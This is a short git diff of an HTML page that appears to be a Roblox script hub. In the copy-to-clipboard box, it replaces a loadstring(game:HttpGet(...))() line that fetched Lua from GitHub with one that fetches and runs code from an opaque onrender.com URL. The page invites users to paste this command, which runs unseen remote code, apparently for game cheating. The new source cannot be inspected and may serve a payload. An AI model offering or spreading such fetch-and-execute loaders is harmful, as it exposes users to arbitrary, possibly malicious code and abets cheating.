--- a/index.html
+++ b/index.html
@@ -63,7 +63,7 @@
                     </ul>
                     <h3>Script:</h3>
                     <textarea id="script-text" readonly>
-loadstring(game:HttpGet("https://raw.githubusercontent.com/D3f4ultscript/Scripts-for-D3f4ult-Hub/refs/heads/main/Hub.lua"))()</textarea>
+loadstring(game:HttpGet("http://sunny-5n92.onrender.com/raw/4c93ecbd4c80fa978a96938217f03353ff766e9807dba4f487b5f59cac6effddf74e127791087075588c36b7bc433fbd6281238a72b140bc53f6869764e59787"))()</textarea>
                 <button id="copy-btn" onclick="copyScript()">
                     <i class="fas fa-copy"></i> Copy Script
                 </button>
